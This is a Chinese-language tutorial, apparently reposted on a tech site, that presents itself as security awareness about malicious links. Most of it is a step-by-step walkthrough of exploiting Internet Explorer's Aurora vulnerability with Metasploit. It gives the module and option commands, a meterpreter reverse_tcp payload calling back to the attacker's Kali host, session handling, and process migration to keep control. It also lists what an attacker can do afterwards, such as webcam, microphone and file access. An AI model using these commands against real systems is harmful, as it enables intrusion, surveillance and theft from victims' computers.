您当前的位置:首页 > 电脑百科 > 网络技术 > 网络安全

网络安全普及:为何一条不明链接,就能让电脑换了主人?

时间:2020-07-04 10:46:10  来源:  作者:

总是有人听说,只要点了一条不明链接,电脑就被入侵了!这是不是危言耸听呢?看完下面你就能够明白如何实现了!更多网络安全、Kali白帽渗透,可以前往下方专栏!

客户端与服务端

服务端:比如数据库、服务器、FTP服务器端、ssh等都是服务端程序,一定会在目标系统中开启某个端口用于服务通信。我们扫描这些端口背后的服务,就是针对服务端的主动渗透!

客户端:比如浏览器、PDF文档阅读器、音乐播放器、JAVA等!不会打开系统端口,我们无法主动发起攻击,只能诱使目标去点击、打开、访问一系列操作,比如点击链接、打开文档等行动来利用软件本身的漏洞。这就是被动类型的客户端攻击!

浏览器客户端漏洞

什么是aurora漏洞?

目标的浏览器只要存在一些既定的漏洞,比如微软著名的IE浏览器Aurora漏洞,只要目标使用IE浏览器打开一些含有恶意代码的链接,那么就会立即取得目标电脑系统的权限,完成渗透侵入!这里仅仅用作技术安全演示,旨在教大家分辨网络世界的不安全!

环境准备:

我们需要使用kali自带的渗透利用框架-matasploit!(192.168.31.183)
之前搭建的XP系统,自带IE浏览器!(不需要知道ip)

实战测试

在kali的终端下输入:

msfconsole,开启metasploit!
网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

在msf5下配置输入:

use exploit/windows/browser/ms10_002_auraro
set SRVHOST 192.168.31.183
set SRVPORT 80
set URIPATH aurora
set payload windows/meterpreter/reverse_tcp
网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

SRVHOST:本地kali的服务器地址,kali的ip;
SRVPORT:本地kali被用于web访问的端口,默认设置成8080!如果设置成80,务必保证kali'的80的端口没有被Apache2占用!
URIPATH:就是url网页路径地址,任意定义,这里写成aurora,后面会以192.168.31.183/aura来展现!
set payload:不用多说,如果漏洞利用成功,发送过去控制目标电脑的payload载荷!
set LHOST:载荷反弹回来指定的地址,就是kali的ip地址!
exploit:执行攻击
网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

上图中【*】里的内容,我们只关注:

using URL:http://192.168.31.183:80/aurora

注意:针对客户端(浏览器)的攻击,就是在kali端设置恶意代码服务器,在目标使用浏览器访问我们生成的url链接后,就会触发恶意代码攻击目标浏览器,并发送payload过去控制目标电脑!

电脑访问触发

我们这里仅仅模拟,如果对方在它的IE浏览器访问了我们的链接:

http://192.168.31.183/aurora

我们的msf5就会收到侦听,显示了发送stage到目标XP192.168.31.50中去,但是往往第一次不会建立meterpreter会话,也就说第一次攻击不必成功,只会现实Sending stage!如下图!

网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

此时,你还会发现对方的IE浏览器崩溃,那么你需要强制关闭浏览器并重启浏览器!

当目标再次访问该链接后,就会成功显示meterpreter session 1 opened这样的输出,说明已经建立控制会话,不过你还是看不到meterpreter> 怎么办?

网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

不要慌,我们可以参考上图,先输入:

sessions(一定要出现meterpreter session 1 opened这样的输出才可以这样做!)

然后根据输出的会话ID号选择,上图显示的会话是ID为1,那我们就输入:

sessions 1

进入之前已经建立却没有弹出的会话!

网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

最后当你看到meterpreter>这样的输出,表示成功完成渗透,这一次我们顺利地进行了针对浏览器漏洞的利用侵入!

怎样迁移进程?

至于得到了meterpreter会话,应该不用问接下来怎么操作控制了,比如获取截屏,实时查看桌面,录音、开启摄像头、查看下载对方硬盘文件、迁移进程,在@小白嘿客的《白帽黑客kali初学指南》专栏我们都教过,这里不再赘述!

不过我们重点来讨论下如何进行进程迁移!

为什么要进程迁移呢?当目标的浏览器崩溃了,或者异常退出,甚至是被使用者关闭了,那我们的meterpreter会话也会丢失,失去控制,因为meterpreter都是建立在对方内存中的,关闭了进程,就会失去控制!

这里可以使用一个“手动挡”的做法——在meterpreter会话下,输入:

ps 查看下目标进程id和进程详细
网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

在里面寻找一个“explorer.exe的进程”,如上图,pid是4064。该进程只有目标系统重启了,才会注销,所以我们要及时将meterpreter会话和这个进程进行绑定!

继续在meterpreter会话下输入:

migrate 4064
网络安全普及:为何一条不明链接,就能让电脑换了主人?

 

此时就会完成绑定,即使目标关闭了浏览器,我们也是照样可以稳稳控制!

下节课,我们整个meterpreter会话的自动执行脚本,实现目标访问链接,在建立meterpreter会话后自动转移会话进程,建立持久的渗透控制!

小白嘿客我想说

网络安全关乎到每一个人,只有足够的了解它,才能完全战胜它!



Tags:网络安全   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
中新网12月27日电 据中国网信网消息,近日,中央网络安全和信息化委员会印发《“十四五”国家信息化规划》(以下简称《规划》),对我国“十四五”时期信息化发展作出部署安排。《...【详细内容】
2021-12-28  Tags: 网络安全  点击:(1)  评论:(0)  加入收藏
据ZDNet12月24日报道,CISA本周发布了自己的Log4J扫描器,同时发布的还有网络安全公司和研究人员发布的其他扫描器。开源的Log4j扫描器是由开源社区其他成员创建的扫描器派生而...【详细内容】
2021-12-24  Tags: 网络安全  点击:(10)  评论:(0)  加入收藏
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  Tags: 网络安全  点击:(29)  评论:(0)  加入收藏
网络安全板块是什么 1、网络安全网络安全是计算机行业中网络、计算、储存外的第四个基础设施。是计算机行业中增速最快的超千亿的板块。2、近几个月来大涨四个原因滴滴事件...【详细内容】
2021-12-08  Tags: 网络安全  点击:(19)  评论:(0)  加入收藏
即使在安全技术取得进步之后,网络犯罪仍在不断增加。据统计,网络犯罪每分钟给企业造成约 290 万美元的损失。主要是因为新技术不断涌现,难以维护安全。随着网络威胁的增加,网络...【详细内容】
2021-11-04  Tags: 网络安全  点击:(40)  评论:(0)  加入收藏
网友们,过去一年,您的网络安全段位提升了吗?需要更多的专属利器加持吗?今年我们又为您准备了丰富的网络安全知识大餐,助您驰骋网络,为网络安全护航!2021年10月11日至17日为“国家网...【详细内容】
2021-10-13  Tags: 网络安全  点击:(49)  评论:(0)  加入收藏
随着网络安全防御需求扩大,网安技术、产品和解决方案数量也随之激增。为了了解和驾驭全球网络安全市场,对比国内外网络安全企业的差异,今天我们来看看由国外网络安全垂直媒体eS...【详细内容】
2021-09-18  Tags: 网络安全  点击:(189)  评论:(0)  加入收藏
前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称,其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】
2021-09-06  Tags: 网络安全  点击:(47)  评论:(0)  加入收藏
前言上次带大家了解了什么是黑客,黑客是干嘛的,今天就来看看黑客的收入和方向怎么样。一个黑客年薪是多少呢?外界普遍认为黑客是高收入群体,那么你想过黑客是怎么赚钱的吗?黑客...【详细内容】
2021-08-24  Tags: 网络安全  点击:(122)  评论:(0)  加入收藏
很多小伙伴都想入行网络安全,因为网络安全高薪,未来发展前景好,但是不知道网络安全学习路线是什么样的?网络安全学多久能找工作?我们就来梳理一下。 网络安全虽然好上手,入门难度...【详细内容】
2021-08-23  Tags: 网络安全  点击:(72)  评论:(0)  加入收藏
▌简易百科推荐
一、背景介绍永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获...【详细内容】
2021-12-27  Kali与编程    Tags:勒索病毒   点击:(3)  评论:(0)  加入收藏
一、SQL注入漏洞SQL 注入攻击( SQL Injection ),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串...【详细内容】
2021-12-10  华清信安    Tags:Web漏洞   点击:(23)  评论:(0)  加入收藏
AD域是目前大型企业常用的内网管理方案,但随着近年来实网演习的常态化和不断深入,AD域安全越来越得到企业的重视。不论是在演练还是在真实的高级攻击场景中,在复盘中可以看出,大...【详细内容】
2021-10-27    中国信息安全  Tags:AD域   点击:(38)  评论:(0)  加入收藏
网友们,过去一年,您的网络安全段位提升了吗?需要更多的专属利器加持吗?今年我们又为您准备了丰富的网络安全知识大餐,助您驰骋网络,为网络安全护航!2021年10月11日至17日为“国家网...【详细内容】
2021-10-13    九派教育  Tags:网络安全   点击:(49)  评论:(0)  加入收藏
拓扑环境 Kali Linux(攻击机) Centos6.4(web服务器) win7(域成员主机无法上网) win2008R2(域控无法上网) 目的通过Kali Linux拿到域控权限2021最新整理网络安全\渗透测试/安全学习(全...【详细内容】
2021-09-17  KaliMa    Tags:内网渗透   点击:(90)  评论:(0)  加入收藏
前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称,其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】
2021-09-06  KaliMa    Tags:内网渗透   点击:(47)  评论:(0)  加入收藏
堡垒机,听起来就是一个够酷的名字,有用户笑言,听着名儿就觉着安全,就像大块头施瓦辛格一出现在电影镜头里就像终结者一样。 那么,作为内网安全的"终结者",堡垒机究竟是个什么模样...【详细内容】
2021-08-26  IT技术管理那些事儿    Tags:堡垒机   点击:(76)  评论:(0)  加入收藏
1、VMware Workstation Pro 16: https://download3.vmware.com/software/wkst/file/VMware-workstation-full-16.1.0-17198959.exe VMware Workstation Pro 15【建议】 ht...【详细内容】
2021-08-25  Kali与编程    Tags:虚拟机软件   点击:(71)  评论:(0)  加入收藏
很多小伙伴都想入行网络安全,因为网络安全高薪,未来发展前景好,但是不知道网络安全学习路线是什么样的?网络安全学多久能找工作?我们就来梳理一下。 网络安全虽然好上手,入门难度...【详细内容】
2021-08-23  知了堂    Tags:网络安全   点击:(72)  评论:(0)  加入收藏
入侵一些网站,电脑,制作一些病毒,学会多项编程,这是一个普通黑客都会的技能,那么真正黑客能厉害到什么程度呢?除了勒索病毒,熊猫烧香等自动感染的病毒被大家熟知外,还有更厉害的骚操...【详细内容】
2021-08-19  IT技术管理那些事儿    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条